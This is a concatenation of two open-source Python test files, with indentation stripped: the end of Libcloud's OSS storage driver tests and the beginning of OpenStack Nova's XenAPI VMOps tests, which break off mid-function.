def _foo_bar_object_invalid_size(self, method, url, body, headers):
# test_upload_object_invalid_file_size
body = ''
return (httplib.OK,
body,
headers,
httplib.responses[httplib.OK])
def _foo_test_stream_data_multipart(self, method, url, body, headers):
headers = {}
body = ''
headers = {'etag': '"0cc175b9c0f1b6a831c399e269772661"'}
return (httplib.OK,
body,
headers,
httplib.responses[httplib.OK])
class OSSStorageDriverTestCase(unittest.TestCase):
driver_type = OSSStorageDriver
driver_args = STORAGE_OSS_PARAMS
mock_response_klass = OSSMockHttp
@classmethod
def create_driver(self):
return self.driver_type(*self.driver_args)
def setUp(self):
self.driver_type.connectionCls.conn_class = self.mock_response_klass
self.mock_response_klass.type = None
self.mock_response_klass.test = self
self.driver = self.create_driver()
def tearDown(self):
self._remove_test_file()
def _remove_test_file(self):
file_path = os.path.abspath(__file__) + '.temp'
try:
os.unlink(file_path)
except OSError:
pass
def test_invalid_credentials(self):
self.mock_response_klass.type = 'unauthorized'
self.assertRaises(InvalidCredsError, self.driver.list_containers)
def test_list_containers_empty(self):
self.mock_response_klass.type = 'list_containers_empty'
containers = self.driver.list_containers()
self.assertEqual(len(containers), 0)
def test_list_containers_success(self):
self.mock_response_klass.type = 'list_containers'
containers = self.driver.list_containers()
self.assertEqual(len(containers), 2)
container = containers[0]
self.assertEqual('xz02tphky6fjfiuc0', container.name)
self.assertTrue('creation_date' in container.extra)
self.assertEqual('2014-05-15T11:18:32.000Z',
container.extra['creation_date'])
self.assertTrue('location' in container.extra)
self.assertEqual('oss-cn-hangzhou-a', container.extra['location'])
self.assertEqual(self.driver, container.driver)
def test_list_container_objects_empty(self):
self.mock_response_klass.type = 'list_container_objects_empty'
container = Container(name='test_container', extra={},
driver=self.driver)
objects = self.driver.list_container_objects(container=container)
self.assertEqual(len(objects), 0)
def test_list_container_objects_success(self):
self.mock_response_klass.type = 'list_container_objects'
container = Container(name='test_container', extra={},
driver=self.driver)
objects = self.driver.list_container_objects(container=container)
self.assertEqual(len(objects), 2)
obj = objects[0]
self.assertEqual(obj.name, 'en/')
self.assertEqual(obj.hash, 'D41D8CD98F00B204E9800998ECF8427E')
self.assertEqual(obj.size, 0)
self.assertEqual(obj.container.name, 'test_container')
self.assertEqual(
obj.extra['last_modified'], '2016-01-15T14:43:15.000Z')
self.assertTrue('owner' in obj.meta_data)
def test_list_container_objects_with_chinese(self):
self.mock_response_klass.type = 'list_container_objects_chinese'
container = Container(name='test_container', extra={},
driver=self.driver)
objects = self.driver.list_container_objects(container=container)
self.assertEqual(len(objects), 2)
obj = [o for o in objects
if o.name == 'WEB控制台.odp'][0]
self.assertEqual(obj.hash, '281371EA1618CF0E645D6BB90A158276')
self.assertEqual(obj.size, 1234567)
self.assertEqual(obj.container.name, 'test_container')
self.assertEqual(
obj.extra['last_modified'], '2016-01-15T14:43:06.000Z')
self.assertTrue('owner' in obj.meta_data)
def test_list_container_objects_with_prefix(self):
self.mock_response_klass.type = 'list_container_objects_prefix'
container = Container(name='test_container', extra={},
driver=self.driver)
self.prefix = 'test_prefix'
objects = self.driver.list_container_objects(container=container,
prefix=self.prefix)
self.assertEqual(len(objects), 2)
def test_get_container_doesnt_exist(self):
self.mock_response_klass.type = 'get_container'
self.assertRaises(ContainerDoesNotExistError,
self.driver.get_container,
container_name='not-existed')
def test_get_container_success(self):
self.mock_response_klass.type = 'get_container'
container = self.driver.get_container(
container_name='xz02tphky6fjfiuc0')
self.assertTrue(container.name, 'xz02tphky6fjfiuc0')
def test_get_object_container_doesnt_exist(self):
self.mock_response_klass.type = 'get_object'
self.assertRaises(ObjectDoesNotExistError,
self.driver.get_object,
container_name='xz02tphky6fjfiuc0',
object_name='notexisted')
def test_get_object_success(self):
self.mock_response_klass.type = 'get_object'
obj = self.driver.get_object(container_name='xz02tphky6fjfiuc0',
object_name='test')
self.assertEqual(obj.name, 'test')
self.assertEqual(obj.container.name, 'xz02tphky6fjfiuc0')
self.assertEqual(obj.size, 0)
self.assertEqual(obj.hash, 'D41D8CD98F00B204E9800998ECF8427E')
self.assertEqual(obj.extra['last_modified'],
'Fri, 15 Jan 2016 14:43:15 GMT')
self.assertEqual(obj.extra['content_type'], 'application/octet-stream')
self.assertEqual(obj.meta_data['rabbits'], 'monkeys')
def test_create_container_bad_request(self):
# invalid container name, returns a 400 bad request
self.mock_response_klass.type = 'invalid_name'
self.assertRaises(ContainerError,
self.driver.create_container,
container_name='invalid_name')
def test_create_container_already_exists(self):
# container with this name already exists
self.mock_response_klass.type = 'already_exists'
self.assertRaises(InvalidContainerNameError,
self.driver.create_container,
container_name='new-container')
def test_create_container_success(self):
# success
self.mock_response_klass.type = 'create_container'
name = 'new_container'
container = self.driver.create_container(container_name=name)
self.assertEqual(container.name, name)
def test_create_container_with_ex_location(self):
self.mock_response_klass.type = 'create_container_location'
name = 'new_container'
self.ex_location = 'oss-cn-beijing'
container = self.driver.create_container(container_name=name,
ex_location=self.ex_location)
self.assertEqual(container.name, name)
self.assertTrue(container.extra['location'], self.ex_location)
def test_delete_container_doesnt_exist(self):
container = Container(name='new_container', extra=None,
driver=self.driver)
self.mock_response_klass.type = 'delete_container_doesnt_exist'
self.assertRaises(ContainerDoesNotExistError,
self.driver.delete_container,
container=container)
def test_delete_container_not_empty(self):
container = Container(name='new_container', extra=None,
driver=self.driver)
self.mock_response_klass.type = 'delete_container_not_empty'
self.assertRaises(ContainerIsNotEmptyError,
self.driver.delete_container,
container=container)
def test_delete_container_success(self):
self.mock_response_klass.type = 'delete_container'
container = Container(name='new_container', extra=None,
driver=self.driver)
self.assertTrue(self.driver.delete_container(container=container))
def test_download_object_success(self):
container = Container(name='foo_bar_container', extra={},
driver=self.driver)
obj = Object(name='foo_bar_object', size=1000, hash=None, extra={},
container=container, meta_data=None,
driver=self.driver_type)
destination_path = os.path.abspath(__file__) + '.temp'
result = self.driver.download_object(obj=obj,
destination_path=destination_path,
overwrite_existing=False,
delete_on_failure=True)
self.assertTrue(result)
def test_download_object_invalid_file_size(self):
self.mock_response_klass.type = 'invalid_size'
container = Container(name='foo_bar_container', extra={},
driver=self.driver)
obj = Object(name='foo_bar_object', size=1000, hash=None, extra={},
container=container, meta_data=None,
driver=self.driver_type)
destination_path = os.path.abspath(__file__) + '.temp'
result = self.driver.download_object(obj=obj,
destination_path=destination_path,
overwrite_existing=False,
delete_on_failure=True)
self.assertFalse(result)
def test_download_object_not_found(self):
self.mock_response_klass.type = 'not_found'
container = Container(name='foo_bar_container', extra={},
driver=self.driver)
obj = Object(name='foo_bar_object', size=1000, hash=None, extra={},
container=container, meta_data=None,
driver=self.driver_type)
destination_path = os.path.abspath(__file__) + '.temp'
self.assertRaises(ObjectDoesNotExistError,
self.driver.download_object,
obj=obj,
destination_path=destination_path,
overwrite_existing=False,
delete_on_failure=True)
def test_download_object_as_stream_success(self):
container = Container(name='foo_bar_container', extra={},
driver=self.driver)
obj = Object(name='foo_bar_object', size=1000, hash=None, extra={},
container=container, meta_data=None,
driver=self.driver_type)
stream = self.driver.download_object_as_stream(obj=obj,
chunk_size=None)
self.assertTrue(hasattr(stream, '__iter__'))
def test_upload_object_invalid_hash1(self):
def upload_file(self, object_name=None, content_type=None,
request_path=None, request_method=None,
headers=None, file_path=None, stream=None):
return {'response': make_response(200, headers={'etag': '2345'}),
'bytes_transferred': 1000,
'data_hash': 'hash343hhash89h932439jsaa89'}
self.mock_response_klass.type = 'INVALID_HASH1'
old_func = self.driver_type._upload_object
self.driver_type._upload_object = upload_file
file_path = os.path.abspath(__file__)
container = Container(name='foo_bar_container', extra={},
driver=self.driver)
object_name = 'foo_test_upload'
try:
self.driver.upload_object(file_path=file_path, container=container,
object_name=object_name,
verify_hash=True)
except ObjectHashMismatchError:
pass
else:
self.fail(
'Invalid hash was returned but an exception was not thrown')
finally:
self.driver_type._upload_object = old_func
def test_upload_object_success(self):
def upload_file(self, object_name=None, content_type=None,
request_path=None, request_method=None,
headers=None, file_path=None, stream=None):
return {'response': make_response(200,
headers={'etag': '0cc175b9c0f1b6a831c399e269772661'}),
'bytes_transferred': 1000,
'data_hash': '0cc175b9c0f1b6a831c399e269772661'}
self.mock_response_klass.type = None
old_func = self.driver_type._upload_object
self.driver_type._upload_object = upload_file
file_path = os.path.abspath(__file__)
container = Container(name='foo_bar_container', extra={},
driver=self.driver)
object_name = 'foo_test_upload'
extra = {'meta_data': {'some-value': 'foobar'}}
obj = self.driver.upload_object(file_path=file_path,
container=container,
object_name=object_name,
extra=extra,
verify_hash=True)
self.assertEqual(obj.name, 'foo_test_upload')
self.assertEqual(obj.size, 1000)
self.assertTrue('some-value' in obj.meta_data)
self.driver_type._upload_object = old_func
def test_upload_object_with_acl(self):
def upload_file(self, object_name=None, content_type=None,
request_path=None, request_method=None,
headers=None, file_path=None, stream=None):
return {'response': make_response(200, headers={'etag': '0cc175b9c0f1b6a831c399e269772661'}),
'bytes_transferred': 1000,
'data_hash': '0cc175b9c0f1b6a831c399e269772661'}
self.mock_response_klass.type = None
old_func = self.driver_type._upload_object
self.driver_type._upload_object = upload_file
file_path = os.path.abspath(__file__)
container = Container(name='foo_bar_container', extra={},
driver=self.driver)
object_name = 'foo_test_upload'
extra = {'acl': 'public-read'}
obj = self.driver.upload_object(file_path=file_path,
container=container,
object_name=object_name,
extra=extra,
verify_hash=True)
self.assertEqual(obj.name, 'foo_test_upload')
self.assertEqual(obj.size, 1000)
self.assertEqual(obj.extra['acl'], 'public-read')
self.driver_type._upload_object = old_func
def test_upload_object_with_invalid_acl(self):
file_path = os.path.abspath(__file__)
container = Container(name='foo_bar_container', extra={},
driver=self.driver)
object_name = 'foo_test_upload'
extra = {'acl': 'invalid-acl'}
self.assertRaises(AttributeError,
self.driver.upload_object,
file_path=file_path,
container=container,
object_name=object_name,
extra=extra,
verify_hash=True)
def test_upload_empty_object_via_stream(self):
if self.driver.supports_multipart_upload:
self.mock_response_klass.type = 'multipart'
else:
self.mock_response_klass.type = None
container = Container(name='foo_bar_container', extra={},
driver=self.driver)
object_name = 'foo_test_stream_data'
iterator = DummyIterator(data=[''])
extra = {'content_type': 'text/plain'}
obj = self.driver.upload_object_via_stream(container=container,
object_name=object_name,
iterator=iterator,
extra=extra)
self.assertEqual(obj.name, object_name)
self.assertEqual(obj.size, 0)
def test_upload_small_object_via_stream(self):
if self.driver.supports_multipart_upload:
self.mock_response_klass.type = 'multipart'
else:
self.mock_response_klass.type = None
container = Container(name='foo_bar_container', extra={},
driver=self.driver)
object_name = 'foo_test_stream_data'
iterator = DummyIterator(data=['2', '3', '5'])
extra = {'content_type': 'text/plain'}
obj = self.driver.upload_object_via_stream(container=container,
object_name=object_name,
iterator=iterator,
extra=extra)
self.assertEqual(obj.name, object_name)
self.assertEqual(obj.size, 3)
def test_upload_big_object_via_stream(self):
if self.driver.supports_multipart_upload:
self.mock_response_klass.type = 'multipart'
else:
self.mock_response_klass.type = None
container = Container(name='foo_bar_container', extra={},
driver=self.driver)
object_name = 'foo_test_stream_data'
iterator = DummyIterator(
data=['2' * CHUNK_SIZE, '3' * CHUNK_SIZE, '5'])
extra = {'content_type': 'text/plain'}
obj = self.driver.upload_object_via_stream(container=container,
object_name=object_name,
iterator=iterator,
extra=extra)
self.assertEqual(obj.name, object_name)
self.assertEqual(obj.size, CHUNK_SIZE * 2 + 1)
def test_upload_object_via_stream_abort(self):
if not self.driver.supports_multipart_upload:
return
self.mock_response_klass.type = 'MULTIPART'
def _faulty_iterator():
for i in range(0, 5):
yield str(i)
raise RuntimeError('Error in fetching data')
container = Container(name='foo_bar_container', extra={},
driver=self.driver)
object_name = 'foo_test_stream_data'
iterator = _faulty_iterator()
extra = {'content_type': 'text/plain'}
try:
self.driver.upload_object_via_stream(container=container,
object_name=object_name,
iterator=iterator,
extra=extra)
except Exception:
pass
return
def test_ex_iterate_multipart_uploads(self):
if not self.driver.supports_multipart_upload:
return
self.mock_response_klass.type = 'list_multipart'
container = Container(name='foo_bar_container', extra={},
driver=self.driver)
for upload in self.driver.ex_iterate_multipart_uploads(container,
max_uploads=2):
self.assertTrue(upload.key is not None)
self.assertTrue(upload.id is not None)
self.assertTrue(upload.initiated is not None)
def test_ex_abort_all_multipart_uploads(self):
if not self.driver.supports_multipart_upload:
return
self.mock_response_klass.type = 'list_multipart'
container = Container(name='foo_bar_container', extra={},
driver=self.driver)
with mock.patch('libcloud.storage.drivers.oss.OSSStorageDriver'
'._abort_multipart', autospec=True) as mock_abort:
self.driver.ex_abort_all_multipart_uploads(container)
self.assertEqual(3, mock_abort.call_count)
def test_delete_object_not_found(self):
self.mock_response_klass.type = 'not_found'
container = Container(name='foo_bar_container', extra={},
driver=self.driver)
obj = Object(name='foo_bar_object', size=1234, hash=None, extra=None,
meta_data=None, container=container, driver=self.driver)
self.assertRaises(ObjectDoesNotExistError,
self.driver.delete_object,
obj=obj)
def test_delete_object_success(self):
self.mock_response_klass.type = 'delete'
container = Container(name='foo_bar_container', extra={},
driver=self.driver)
obj = Object(name='foo_bar_object', size=1234, hash=None, extra=None,
meta_data=None, container=container, driver=self.driver)
result = self.driver.delete_object(obj=obj)
self.assertTrue(result)
if __name__ == '__main__':
sys.exit(unittest.main())
| Kami/libcloud | libcloud/test/storage/test_oss.py | Python | apache-2.0 | 31,715 |
# Copyright 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from eventlet import greenthread
import mock
from nova.compute import power_state
from nova.compute import task_states
from nova import context
from nova import exception
from nova import objects
from nova.objects import fields
from nova.pci import manager as pci_manager
from nova import test
from nova.tests.unit import fake_flavor
from nova.tests.unit import fake_instance
from nova.tests.unit.virt.xenapi import stubs
from nova.virt import fake
from nova.virt.xenapi import agent as xenapi_agent
from nova.virt.xenapi.client import session as xenapi_session
from nova.virt.xenapi import fake as xenapi_fake
from nova.virt.xenapi import vm_utils
from nova.virt.xenapi import vmops
from nova.virt.xenapi import volume_utils
from nova.virt.xenapi import volumeops
class VMOpsTestBase(stubs.XenAPITestBaseNoDB):
def setUp(self):
super(VMOpsTestBase, self).setUp()
self._setup_mock_vmops()
self.vms = []
def _setup_mock_vmops(self, product_brand=None, product_version=None):
stubs.stubout_session(self.stubs, xenapi_fake.SessionBase)
self._session = xenapi_session.XenAPISession('test_url', 'root',
'test_pass')
self.vmops = vmops.VMOps(self._session, fake.FakeVirtAPI())
def create_vm(self, name, state="Running"):
vm_ref = xenapi_fake.create_vm(name, state)
self.vms.append(vm_ref)
vm = xenapi_fake.get_record("VM", vm_ref)
return vm, vm_ref
def tearDown(self):
super(VMOpsTestBase, self).tearDown()
for vm in self.vms:
xenapi_fake.destroy_vm(vm)
class VMOpsTestCase(VMOpsTestBase):
def setUp(self):
super(VMOpsTestCase, self).setUp()
self._setup_mock_vmops()
self.context = context.RequestContext('user', 'project')
self.instance = fake_instance.fake_instance_obj(self.context)
def _setup_mock_vmops(self, product_brand=None, product_version=None):
self._session = self._get_mock_session(product_brand, product_version)
self._vmops = vmops.VMOps(self._session, fake.FakeVirtAPI())
def _get_mock_session(self, product_brand, product_version):
class Mock(object):
pass
mock_session = Mock()
mock_session.product_brand = product_brand
mock_session.product_version = product_version
return mock_session
def _test_finish_revert_migration_after_crash(self, backup_made, new_made,
vm_shutdown=True):
instance = {'name': 'foo',
'task_state': task_states.RESIZE_MIGRATING}
context = 'fake_context'
self.mox.StubOutWithMock(vm_utils, 'lookup')
self.mox.StubOutWithMock(self._vmops, '_destroy')
self.mox.StubOutWithMock(vm_utils, 'set_vm_name_label')
self.mox.StubOutWithMock(self._vmops, '_attach_mapped_block_devices')
self.mox.StubOutWithMock(self._vmops, '_start')
self.mox.StubOutWithMock(vm_utils, 'is_vm_shutdown')
vm_utils.lookup(self._session, 'foo-orig').AndReturn(
backup_made and 'foo' or None)
vm_utils.lookup(self._session, 'foo').AndReturn(
(not backup_made or new_made) and 'foo' or None)
if backup_made:
if new_made:
self._vmops._destroy(instance, 'foo')
vm_utils.set_vm_name_label(self._session, 'foo', 'foo')
self._vmops._attach_mapped_block_devices(instance, [])
vm_utils.is_vm_shutdown(self._session, 'foo').AndReturn(vm_shutdown)
if vm_shutdown:
self._vmops._start(instance, 'foo')
self.mox.ReplayAll()
self._vmops.finish_revert_migration(context, instance, [])
def test_finish_revert_migration_after_crash(self):
self._test_finish_revert_migration_after_crash(True, True)
def test_finish_revert_migration_after_crash_before_new(self):
self._test_finish_revert_migration_after_crash(True, False)
def test_finish_revert_migration_after_crash_before_backup(self):
self._test_finish_revert_migration_after_crash(False, False)
def test_xsm_sr_check_relaxed_cached(self):
self.make_plugin_call_count = 0
def fake_make_plugin_call(plugin, method, **args):
self.make_plugin_call_count = self.make_plugin_call_count + 1
return "true"
self.stubs.Set(self._vmops, "_make_plugin_call",
fake_make_plugin_call)
self.assertTrue(self._vmops._is_xsm_sr_check_relaxed())
self.assertTrue(self._vmops._is_xsm_sr_check_relaxed())
self.assertEqual(self.make_plugin_call_count, 1)
def test_get_vm_opaque_ref_raises_instance_not_found(self):
instance = {"name": "dummy"}
self.mox.StubOutWithMock(vm_utils, 'lookup')
vm_utils.lookup(self._session, instance['name'], False).AndReturn(None)
self.mox.ReplayAll()
self.assertRaises(exception.InstanceNotFound,
self._vmops._get_vm_opaque_ref, instance)
@mock.patch.object(vm_utils, 'destroy_vm')
@mock.patch.object(vm_utils, 'clean_shutdown_vm')
@mock.patch.object(vm_utils, 'hard_shutdown_vm')
def test_clean_shutdown_no_bdm_on_destroy(self, hard_shutdown_vm,
clean_shutdown_vm, destroy_vm):
vm_ref = 'vm_ref'
self._vmops._destroy(self.instance, vm_ref, destroy_disks=False)
hard_shutdown_vm.assert_called_once_with(self._vmops._session,
self.instance, vm_ref)
self.assertEqual(0, clean_shutdown_vm.call_count)
@mock.patch.object(vm_utils, 'destroy_vm')
@mock.patch.object(vm_utils, 'clean_shutdown_vm')
@mock.patch.object(vm_utils, 'hard_shutdown_vm')
def test_clean_shutdown_with_bdm_on_destroy(self, hard_shutdown_vm,
clean_shutdown_vm, destroy_vm):
vm_ref = 'vm_ref'
block_device_info = {'block_device_mapping': ['fake']}
self._vmops._destroy(self.instance, vm_ref, destroy_disks=False,
block_device_info=block_device_info)
clean_shutdown_vm.assert_called_once_with(self._vmops._session,
self.instance, vm_ref)
self.assertEqual(0, hard_shutdown_vm.call_count)
@mock.patch.object(vm_utils, 'destroy_vm')
@mock.patch.object(vm_utils, 'clean_shutdown_vm', return_value=False)
@mock.patch.object(vm_utils, 'hard_shutdown_vm')
def test_clean_shutdown_with_bdm_failed_on_destroy(self, hard_shutdown_vm,
clean_shutdown_vm, destroy_vm):
vm_ref = 'vm_ref'
block_device_info = {'block_device_mapping': ['fake']}
self._vmops._destroy(self.instance, vm_ref, destroy_disks=False,
block_device_info=block_device_info)
clean_shutdown_vm.assert_called_once_with(self._vmops._session,
self.instance, vm_ref)
hard_shutdown_vm.assert_called_once_with(self._vmops._session,
self.instance, vm_ref)
@mock.patch.object(vm_utils, 'try_auto_configure_disk')
@mock.patch.object(vm_utils, 'create_vbd',
side_effect=test.TestingException)
def test_attach_disks_rescue_auto_disk_config_false(self, create_vbd,
try_auto_config):
ctxt = context.RequestContext('user', 'project')
instance = fake_instance.fake_instance_obj(ctxt)
image_meta = objects.ImageMeta.from_dict(
{'properties': {'auto_disk_config': 'false'}})
vdis = {'root': {'ref': 'fake-ref'}}
self.assertRaises(test.TestingException, self._vmops._attach_disks,
instance, image_meta=image_meta, vm_ref=None,
name_label=None, vdis=vdis, disk_image_type='fake',
network_info=[], rescue=True)
self.assertFalse(try_auto_config.called)
@mock.patch.object(vm_utils, 'try_auto_configure_disk')
@mock.patch.object(vm_utils, 'create_vbd',
side_effect=test.TestingException)
def test_attach_disks_rescue_auto_disk_config_true(self, create_vbd,
try_auto_config):
ctxt = context.RequestContext('user', 'project')
instance = fake_instance.fake_instance_obj(ctxt)
image_meta = objects.ImageMeta.from_dict(
{'properties': {'auto_disk_config': 'true'}})
vdis = {'root': {'ref': 'fake-ref'}}
self.assertRaises(test.TestingException, self._vmops._attach_disks,
instance, image_meta=image_meta, vm_ref=None,
name_label=None, vdis=vdis, disk_image_type='fake',
network_info=[], rescue=True)
try_auto_config.assert_called_once_with(self._vmops._session,
'fake-ref', instance.flavor.root_gb)
class InjectAutoDiskConfigTestCase(VMOpsTestBase):
def test_inject_auto_disk_config_when_present(self):
vm, vm_ref = self.create_vm("dummy")
instance = {"name": "dummy", "uuid": "1234", "auto_disk_config": True}
self.vmops._inject_auto_disk_config(instance, vm_ref)
xenstore_data = vm['xenstore_data']
self.assertEqual(xenstore_data['vm-data/auto-disk-config'], 'True')
def test_inject_auto_disk_config_none_as_false(self):
vm, vm_ref = self.create_vm("dummy")
instance = {"name": "dummy", "uuid": "1234", "auto_disk_config": None}
self.vmops._inject_auto_disk_config(instance, vm_ref)
xenstore_data = vm['xenstore_data']
self.assertEqual(xenstore_data['vm-data/auto-disk-config'], 'False')
class GetConsoleOutputTestCase(VMOpsTestBase):
def test_get_console_output_works(self):
self.mox.StubOutWithMock(self.vmops, '_get_last_dom_id')
instance = {"name": "dummy"}
self.vmops._get_last_dom_id(instance, check_rescue=True).AndReturn(42)
self.mox.ReplayAll()
self.assertEqual("dom_id: 42", self.vmops.get_console_output(instance))
def test_get_console_output_throws_nova_exception(self):
self.mox.StubOutWithMock(self.vmops, '_get_last_dom_id')
instance = {"name": "dummy"}
# dom_id=0 used to trigger exception in fake XenAPI
self.vmops._get_last_dom_id(instance, check_rescue=True).AndReturn(0)
self.mox.ReplayAll()
self.assertRaises(exception.NovaException,
self.vmops.get_console_output, instance)
def test_get_dom_id_works(self):
instance = {"name": "dummy"}
vm, vm_ref = self.create_vm("dummy")
self.assertEqual(vm["domid"], self.vmops._get_dom_id(instance))
def test_get_dom_id_works_with_rescue_vm(self):
instance = {"name": "dummy"}
vm, vm_ref = self.create_vm("dummy-rescue")
self.assertEqual(vm["domid"],
self.vmops._get_dom_id(instance, check_rescue=True))
def test_get_dom_id_raises_not_found(self):
instance = {"name": "dummy"}
self.create_vm("not-dummy")
self.assertRaises(exception.NotFound, self.vmops._get_dom_id, instance)
def test_get_dom_id_works_with_vmref(self):
vm, vm_ref = self.create_vm("dummy")
self.assertEqual(vm["domid"],
self.vmops._get_dom_id(vm_ref=vm_ref))
class SpawnTestCase(VMOpsTestBase):
def _stub_out_common(self):
self.mox.StubOutWithMock(self.vmops, '_ensure_instance_name_unique')
self.mox.StubOutWithMock(self.vmops, '_ensure_enough_free_mem')
self.mox.StubOutWithMock(self.vmops, '_update_instance_progress')
self.mox.StubOutWithMock(vm_utils, 'determine_disk_image_type')
self.mox.StubOutWithMock(self.vmops, '_get_vdis_for_instance')
self.mox.StubOutWithMock(vm_utils, 'safe_destroy_vdis')
self.mox.StubOutWithMock(self.vmops._volumeops,
'safe_cleanup_from_vdis')
self.mox.StubOutWithMock(self.vmops, '_resize_up_vdis')
self.mox.StubOutWithMock(vm_utils,
'create_kernel_and_ramdisk')
self.mox.StubOutWithMock(vm_utils, 'destroy_kernel_ramdisk')
self.mox.StubOutWithMock(self.vmops, '_create_vm_record')
self.mox.StubOutWithMock(self.vmops, '_destroy')
self.mox.StubOutWithMock(self.vmops, '_attach_disks')
self.mox.StubOutWithMock(pci_manager, 'get_instance_pci_devs')
self.mox.StubOutWithMock(vm_utils, 'set_other_config_pci')
self.mox.StubOutWithMock(self.vmops, '_attach_orig_disks')
self.mox.StubOutWithMock(self.vmops, 'inject_network_info')
self.mox.StubOutWithMock(self.vmops, '_inject_hostname')
self.mox.StubOutWithMock(self.vmops, '_inject_instance_metadata')
self.mox.StubOutWithMock(self.vmops, '_inject_auto_disk_config')
self.mox.StubOutWithMock(self.vmops, '_file_inject_vm_settings')
self.mox.StubOutWithMock(self.vmops, '_create_vifs')
self.mox.StubOutWithMock(self.vmops.firewall_driver,
'setup_basic_filtering')
self.mox.StubOutWithMock(self.vmops.firewall_driver,
'prepare_instance_filter')
self.mox.StubOutWithMock(self.vmops, '_start')
self.mox.StubOutWithMock(self.vmops, '_wait_for_instance_to_start')
self.mox.StubOutWithMock(self.vmops,
'_configure_new_instance_with_agent')
self.mox.StubOutWithMock(self.vmops, '_remove_hostname')
self.mox.StubOutWithMock(self.vmops.firewall_driver,
'apply_instance_filter')
self.mox.StubOutWithMock(self.vmops, '_update_last_dom_id')
def _test_spawn(self, name_label_param=None, block_device_info_param=None,
rescue=False, include_root_vdi=True, throw_exception=None,
attach_pci_dev=False):
self._stub_out_common()
instance = {"name": "dummy", "uuid": "fake_uuid"}
name_label = name_label_param
if name_label is None:
name_label = "dummy"
image_meta = objects.ImageMeta.from_dict({"id": "image_id"})
context = "context"
session = self.vmops._session
injected_files = "fake_files"
admin_password = "password"
network_info = "net_info"
steps = 10
if rescue:
steps += 1
block_device_info = block_device_info_param
if block_device_info and not block_device_info['root_device_name']:
block_device_info = dict(block_device_info_param)
block_device_info['root_device_name'] = \
self.vmops.default_root_dev
di_type = "di_type"
vm_utils.determine_disk_image_type(image_meta).AndReturn(di_type)
step = 1
self.vmops._update_instance_progress(context, instance, step, steps)
vdis = {"other": {"ref": "fake_ref_2", "osvol": True}}
if include_root_vdi:
vdis["root"] = {"ref": "fake_ref"}
self.vmops._get_vdis_for_instance(context, instance,
name_label, "image_id", di_type,
block_device_info).AndReturn(vdis)
self.vmops._resize_up_vdis(instance, vdis)
step += 1
self.vmops._update_instance_progress(context, instance, step, steps)
kernel_file = "kernel"
ramdisk_file = "ramdisk"
vm_utils.create_kernel_and_ramdisk(context, session,
instance, name_label).AndReturn((kernel_file, ramdisk_file))
step += 1
self.vmops._update_instance_progress(context, instance, step, steps)
vm_ref = "fake_vm_ref"
self.vmops._ensure_instance_name_unique(name_label)
self.vmops._ensure_enough_free_mem(instance)
self.vmops._create_vm_record(context, instance, name_label,
di_type, kernel_file,
ramdisk_file, image_meta, rescue).AndReturn(vm_ref)
step += 1
self.vmops._update_instance_progress(context, instance, step, steps)
self.vmops._attach_disks(instance, image_meta, vm_ref, name_label,
vdis, di_type, network_info, rescue,
admin_password, injected_files)
if attach_pci_dev:
fake_dev = {
'created_at': None,
'updated_at': None,
'deleted_at': None,
'deleted': None,
'id': 1,
'compute_node_id': 1,
'address': '00:00.0',
'vendor_id': '1234',
'product_id': 'abcd',
'dev_type': fields.PciDeviceType.STANDARD,
'status': 'available',
'dev_id': 'devid',
'label': 'label',
'instance_uuid': None,
'extra_info': '{}',
}
pci_manager.get_instance_pci_devs(instance).AndReturn([fake_dev])
vm_utils.set_other_config_pci(self.vmops._session,
vm_ref,
"0/0000:00:00.0")
else:
pci_manager.get_instance_pci_devs(instance).AndReturn([])
step += 1
self.vmops._update_instance_progress(context, instance, step, steps)
self.vmops._inject_instance_metadata(instance, vm_ref)
self.vmops._inject_auto_disk_config(instance, vm_ref)
self.vmops._inject_hostname(instance, vm_ref, rescue)
self.vmops._file_inject_vm_settings(instance, vm_ref, vdis,
network_info)
self.vmops.inject_network_info(instance, network_info, vm_ref)
step += 1
self.vmops._update_instance_progress(context, instance, step, steps)
self.vmops._create_vifs(instance, vm_ref, network_info)
self.vmops.firewall_driver.setup_basic_filtering(instance,
network_info).AndRaise(NotImplementedError)
self.vmops.firewall_driver.prepare_instance_filter(instance,
network_info)
step += 1
self.vmops._update_instance_progress(context, instance, step, steps)
if rescue:
self.vmops._attach_orig_disks(instance, vm_ref)
step += 1
self.vmops._update_instance_progress(context, instance, step,
steps)
self.vmops._start(instance, vm_ref)
self.vmops._wait_for_instance_to_start(instance, vm_ref)
self.vmops._update_last_dom_id(vm_ref)
step += 1
self.vmops._update_instance_progress(context, instance, step, steps)
self.vmops._configure_new_instance_with_agent(instance, vm_ref,
injected_files, admin_password)
self.vmops._remove_hostname(instance, vm_ref)
step += 1
self.vmops._update_instance_progress(context, instance, step, steps)
self.vmops.firewall_driver.apply_instance_filter(instance,
network_info)
step += 1
last_call = self.vmops._update_instance_progress(context, instance,
step, steps)
if throw_exception:
last_call.AndRaise(throw_exception)
self.vmops._destroy(instance, vm_ref, network_info=network_info)
vm_utils.destroy_kernel_ramdisk(self.vmops._session, instance,
kernel_file, ramdisk_file)
vm_utils.safe_destroy_vdis(self.vmops._session, ["fake_ref"])
self.vmops._volumeops.safe_cleanup_from_vdis(["fake_ref_2"])
self.mox.ReplayAll()
self.vmops.spawn(context, instance, image_meta, injected_files,
admin_password, network_info,
block_device_info_param, name_label_param, rescue)
def test_spawn(self):
self._test_spawn()
def test_spawn_with_alternate_options(self):
self._test_spawn(include_root_vdi=False, rescue=True,
name_label_param="bob",
block_device_info_param={"root_device_name": ""})
def test_spawn_with_pci_available_on_the_host(self):
self._test_spawn(attach_pci_dev=True)
def test_spawn_performs_rollback_and_throws_exception(self):
self.assertRaises(test.TestingException, self._test_spawn,
throw_exception=test.TestingException())
def _test_finish_migration(self, power_on=True, resize_instance=True,
throw_exception=None, booted_from_volume=False):
self._stub_out_common()
self.mox.StubOutWithMock(volumeops.VolumeOps, "connect_volume")
self.mox.StubOutWithMock(self.vmops._session, 'call_xenapi')
self.mox.StubOutWithMock(vm_utils, "import_all_migrated_disks")
self.mox.StubOutWithMock(self.vmops, "_attach_mapped_block_devices")
context = "context"
migration = {}
name_label = "dummy"
instance = {"name": name_label, "uuid": "fake_uuid",
"root_device_name": "/dev/xvda"}
disk_info = "disk_info"
